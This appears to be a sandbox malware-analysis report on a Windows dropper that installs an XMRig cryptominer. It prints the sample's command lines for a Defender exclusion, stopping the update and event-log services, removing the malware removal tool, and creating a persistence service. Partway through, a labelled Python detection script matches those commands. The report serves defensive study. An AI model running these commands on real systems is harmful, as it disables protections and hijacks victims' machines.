Windows Analysis Report
mav17final.exe

Overview

General Information

Sample name: mav17final.exe
Analysis ID: 1445527
MD5: 9e77a1c36b7ee264c38b958963769c08
SHA1: eb7ad58040a6dbf826a37d52c26f7ce8ef963342
SHA256: f1836d3e4c6916cdc1f873b430d0a2784885e587683f6917fd51c04eba18933c
Tags: exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Contains functionality to infect the boot sector
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mav17final.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\mav17final.exe" MD5: 9E77A1C36B7EE264C38B958963769C08)
    • mav17final.exe (PID: 1776 cmdline: "C:\Users\user\Desktop\mav17final.exe" MD5: 9E77A1C36B7EE264C38B958963769C08)
      • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6160 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5708 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dialer.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\dialer.exe MD5: 0BCBEA7313655A42ECC0A1FDBCF37993)
          • powershell.exe (PID: 5084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • wusa.exe (PID: 5680 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
          • sc.exe (PID: 6460 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6536 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 1876 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6304 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5440 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 5940 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 3140 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 6460 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 5664 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6192 cmdline: C:\Windows\system32\sc.exe delete "Build" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5960 cmdline: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 3144 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5160 cmdline: C:\Windows\system32\sc.exe start "Build" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer.exe (PID: 6204 cmdline: C:\ProgramData\dialer.exe MD5: 0BCBEA7313655A42ECC0A1FDBCF37993)
    • powershell.exe (PID: 6108 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5776 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1360 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5948 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5084 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5708 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3620 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4720 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5680 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4440 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 2804 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • svchost.exe (PID: 2076 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp
  Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
  Rule: MacOS_Cryptominer_Xmrig_241780a1; Description: unknown; Author: unknown; Strings:
    • 0x37eb98:$a1: mining.set_target
    • 0x370e20:$a2: XMRIG_HOSTNAME
    • 0x373748:$a3: Usage: xmrig [OPTIONS]
    • 0x370df8:$a4: XMRIG_VERSION
Source: 66.2.dwm.exe.140000000.0.unpack
  Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
  Rule: MacOS_Cryptominer_Xmrig_241780a1; Description: unknown; Author: unknown; Strings:
    • 0x37ef98:$a1: mining.set_target
    • 0x371220:$a2: XMRIG_HOSTNAME
    • 0x373b48:$a3: Usage: xmrig [OPTIONS]
    • 0x3711f8:$a4: XMRIG_VERSION
  Rule: MAL_XMR_Miner_May19_1; Description: Detects Monero Crypto Coin Miner; Author: Florian Roth; Strings:
    • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  Rule: MALWARE_Win_CoinMiner02; Description: Detects coinmining malware; Author: ditekSHen; Strings:
    • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
    • 0x3cd180:$s3: \\.\WinRing0_
    • 0x376148:$s4: pool_wallet
    • 0x3705f0:$s5: cryptonight
    • 0x370600:$s5: cryptonight
    • 0x370610:$s5: cryptonight
    • 0x370620:$s5: cryptonight
    • 0x370638:$s5: cryptonight
    • 0x370648:$s5: cryptonight
    • 0x370658:$s5: cryptonight
    • 0x370670:$s5: cryptonight
    • 0x370680:$s5: cryptonight
    • 0x370698:$s5: cryptonight
    • 0x3706b0:$s5: cryptonight
    • 0x3706c0:$s5: cryptonight
    • 0x3706d0:$s5: cryptonight
    • 0x3706e0:$s5: cryptonight
    • 0x3706f8:$s5: cryptonight
    • 0x370710:$s5: cryptonight
    • 0x370720:$s5: cryptonight
    • 0x370730:$s5: cryptonight

      Change of critical system settings

      Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentProcessId: 3664, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5940, ProcessName: powercfg.exe

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mav17final.exe", ParentImage: C:\Users\user\Desktop\mav17final.exe, ParentProcessId: 1776, ParentProcessName: mav17final.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", ProcessId: 5840, ProcessName: cmd.exe
      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mav17final.exe", ParentImage: C:\Users\user\Desktop\mav17final.exe, ParentProcessId: 1776, ParentProcessName: mav17final.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", ProcessId: 5840, ProcessName: cmd.exe
      Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentProcessId: 3664, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto", ProcessId: 5960, ProcessName: sc.exe
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6160, ProcessName: powershell.exe
      Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 2076, ProcessName: svchost.exe

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentProcessId: 3664, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3144, ProcessName: sc.exe
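The process tree and the Sigma hits above describe one tampering sequence: a Defender exclusion, stops of the update and event-log services, power timeouts set to zero, removal of KB890830 (the Malicious Software Removal Tool), an auto-start service whose binary lives in C:\ProgramData, and a dwm.exe spawned by dialer.exe rather than by winlogon.exe. The following is an added example, not part of the Joe Sandbox report, that encodes those checks as rules over process-creation events. The event records are constructed from the command lines listed in the report; the field names (pid, image, cmdline, parent_image) and the System32 path assumed for dwm.exe are not from the report. One detail worth noting about the exclusion: -ExclusionExtension '.exe' excludes every executable on the host from Defender scanning, not only files under the two directories named.

```python
"""Triage Windows process-creation events for the tampering pattern in this
report. Added example; the event records are constructed from the report's
command lines and the record field names are an assumption."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # path of the started process
    cmdline: str
    parent_image: str   # path of the parent process


# Services the sample stops: Windows Update (UsoSvc, WaaSMedicSvc, wuauserv),
# BITS, Delivery Optimization (dosvc) and the Windows Event Log.
TARGET_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc", "eventlog"}

# Locations from which a legitimate auto-start service binary is not expected.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "\\temp\\")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list:
    """Return the rule names matched by one event (empty list = nothing seen)."""
    hits = []
    name = _basename(ev.image)
    low = ev.cmdline.lower()

    # Add-MpPreference with an exclusion switch. -ExclusionExtension '.exe'
    # stops Defender scanning every executable on the host, not one folder.
    if "add-mppreference" in low and re.search(r"-exclusion(path|extension|process)\b", low):
        hits.append("defender_exclusion")

    if name == "sc.exe":
        m = re.search(r'\bstop\s+"?([\w-]+)', low)
        if m and m.group(1) in TARGET_SERVICES:
            hits.append("eventlog_stop" if m.group(1) == "eventlog" else "update_service_stop")
        # sc create <name> binpath= <path>: flag binaries in user-writable locations.
        m = re.search(r'\bcreate\b.*binpath=\s*"?([^"\s]+)', low)
        if m and any(d in m.group(1) for d in USER_WRITABLE):
            hits.append("service_create_user_writable")

    # powercfg /x -<standby|hibernate>-timeout-<ac|dc> 0 keeps the host awake for mining.
    if name == "powercfg.exe" and re.search(r"-(standby|hibernate)-timeout-(ac|dc)\s+0\b", low):
        hits.append("power_timeouts_disabled")

    # wusa /uninstall /kb:890830 removes the Malicious Software Removal Tool.
    if name == "wusa.exe" and "/uninstall" in low and "/kb:890830" in low:
        hits.append("msrt_uninstall")

    # A genuine dwm.exe is started by winlogon.exe; in the report it is a child of dialer.exe.
    if name == "dwm.exe" and _basename(ev.parent_image) != "winlogon.exe":
        hits.append("dwm_unexpected_parent")

    return hits


def triage_all(events) -> dict:
    """Map each matched rule to the PIDs that triggered it, in event order."""
    by_rule = defaultdict(list)
    for ev in events:
        for rule in triage(ev):
            by_rule[rule].append(ev.pid)
    return dict(by_rule)


# Constructed events taken from the report's process tree (paths of the
# dwm.exe image and of the svchost.exe parent are assumptions).
SAMPLE_EVENTS = [
    ProcEvent(5840, r"C:\Windows\System32\cmd.exe",
              r'''C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"''',
              r"C:\Users\user\Desktop\mav17final.exe"),
    ProcEvent(6160, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(5680, r"C:\Windows\System32\wusa.exe", "wusa /uninstall /kb:890830 /quiet /norestart",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(6460, r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc",
              r"C:\Users\user\AppData\Local\Temp\dialer.exe"),
    ProcEvent(3144, r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog",
              r"C:\Users\user\AppData\Local\Temp\dialer.exe"),
    ProcEvent(5940, r"C:\Windows\System32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0",
              r"C:\Users\user\AppData\Local\Temp\dialer.exe"),
    ProcEvent(5960, r"C:\Windows\System32\sc.exe",
              r'C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"',
              r"C:\Users\user\AppData\Local\Temp\dialer.exe"),
    ProcEvent(2804, r"C:\Windows\System32\dwm.exe", "dwm.exe", r"C:\ProgramData\dialer.exe"),
    # Benign control: a normal service host, expected to match nothing.
    ProcEvent(2076, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager",
              r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for rule, pids in triage_all(SAMPLE_EVENTS).items():
        print(f"{rule:30s} PIDs {pids}")
```

Each rule is deliberately narrow: the service-stop rule only fires for the update and logging services, and the service-create rule only when the binary sits under a user-writable path, so an administrator's `sc create` pointing into Program Files is not flagged.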
      No Snort rule has matched

      AV Detection

      Source: gta5modmenufree.com; Virustotal: Detection: 5%
      Source: C:\ProgramData\dialer.exe; ReversingLabs: Detection: 79%
      Source: C:\ProgramData\dialer.exe; Virustotal: Detection: 65%
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe; ReversingLabs: Detection: 79%
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe; Virustotal: Detection: 65%
      Source: mav17final.exe; ReversingLabs: Detection: 34%
      Source: mav17final.exe; Virustotal: Detection: 16%
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe; Joe Sandbox ML: detected
      Source: C:\ProgramData\dialer.exe; Joe Sandbox ML: detected

      Bitcoin Miner

      Source: Yara match; File source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE
      Source: Yara match; File source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: dwm.exe; String found in binary or memory: cryptonight-monerov7
      Source: mav17final.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mav17final.exe, 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
